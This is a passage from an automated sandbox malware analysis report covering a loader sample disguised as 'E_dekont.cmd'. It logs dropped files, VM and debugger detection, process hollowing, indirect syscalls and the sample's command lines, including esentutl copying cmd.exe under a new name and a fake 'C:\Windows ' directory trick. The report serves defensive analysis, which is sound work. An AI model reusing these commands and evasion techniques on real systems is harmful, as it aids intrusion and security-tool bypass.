                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\AgentService.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
                Source: C:\Users\Public\alpha.pifAPI coverage: 7.9 %
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI coverage: 9.7 %
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifAPI coverage: 8.9 %
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI coverage: 9.6 %
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4784Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4468Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772Thread sleep count: 5124 > 30Jump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772Thread sleep count: 4310 > 30Jump to behavior
                Source: C:\Windows\System32\alg.exe TID: 4520Thread sleep time: -90000s >= -30000s
                Source: C:\Windows\System32\alg.exe TID: 6164Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 3148Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5240Thread sleep time: -260000s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5396Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\msdtc.exe TID: 2668Thread sleep count: 484 > 30
                Source: C:\Windows\System32\msdtc.exe TID: 2668Thread sleep time: -48400s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 2944Thread sleep time: -250000s >= -30000s
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5912Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02AF5908
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,13_2_00020207
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,13_2_0002589A
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,13_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,13_2_0001532E
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,17_2_0002589A
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,17_2_00020207
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,17_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,17_2_0001532E
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeThread delayed: delay time: 60000
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Y2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                Source: Jwsmvmdw.PIF, 0000001B.00000002.1662054093.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>a9
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure DriverN
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver4
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverVHD Loopback Contr
                Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1635254831.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1610304966.00000000005B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
                Source: AppVClient.exe, 00000016.00000003.1594100597.00000000004A0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000002.1595686617.00000000004A1000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.1593875501.0000000000470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                Source: xpha.pif, 00000012.00000002.1697939115.0000000002EAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
                Source: Jwsmvmdw.PIF, 00000024.00000002.1753075839.0000000000638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-38277
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI call chain: ExitProcess graph end node
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifAPI call chain: ExitProcess graph end node
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFAPI call chain: ExitProcess graph end node
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02B0F744
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess queried: DebugPort
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess queried: DebugPort
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,12_1_004019F0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B0894C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0047B594 mov eax, dword ptr fs:[00000030h]12_1_0047B594
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003C1FA mov eax, dword ptr fs:[00000030h]13_2_0003C1FA
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003C1FA mov eax, dword ptr fs:[00000030h]17_2_0003C1FA
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0047B594 mov eax, dword ptr fs:[00000030h]30_2_0047B594
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10001130 mov eax, dword ptr fs:[00000030h]30_2_10001130
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10043F3D mov eax, dword ptr fs:[00000030h]30_2_10043F3D
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0047B594 mov eax, dword ptr fs:[00000030h]30_1_0047B594
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040ADB0 GetProcessHeap,HeapFree,12_1_0040ADB0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess token adjusted: DebugJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_0040E61C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_1_00416F6A
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004123F1 SetUnhandledExceptionFilter,12_1_004123F1
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00026EC0 SetUnhandledExceptionFilter,13_2_00026EC0
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00026B40
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00026EC0 SetUnhandledExceptionFilter,17_2_00026EC0
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00026B40
                Source: C:\Users\Public\xpha.pifCode function: 18_2_00893600 SetUnhandledExceptionFilter,18_2_00893600
                Source: C:\Users\Public\xpha.pifCode function: 18_2_00893470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00893470
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0040E61C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00416F6A
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_004123F1 SetUnhandledExceptionFilter,30_2_004123F1
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_10041361
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_10044C7B
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_1_0040CE09
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_1_0040E61C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_1_00416F6A
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_004123F1 SetUnhandledExceptionFilter,30_1_004123F1
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFMemory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFMemory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
                Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQuerySystemInformation: Indirect: 0x9B8462
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtAdjustPrivilegesToken: Indirect: 0x9B864C
                Sample uses process hollowing technique
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000Jump to behavior
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFSection unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFSection unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 3FB008Jump to behavior
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFMemory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2B0008
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFMemory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2E2008
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pifJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,30_2_10028550
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02AF5ACC
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02AFA7C4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02AF5BD8
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02AFA810
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: GetLocaleInfoA,12_1_00417A20
                Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,13_2_00018572
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,13_2_00016854
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,13_2_00019310
                Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,17_2_00018572
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,17_2_00016854
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,17_2_00019310
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,27_2_029B5ACC
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,27_2_029B5BD7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetLocaleInfoA,27_2_029BA810
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: GetLocaleInfoA,30_2_00417A20
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: GetLocaleInfoA,30_1_00417A20
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,36_2_029D5ACC
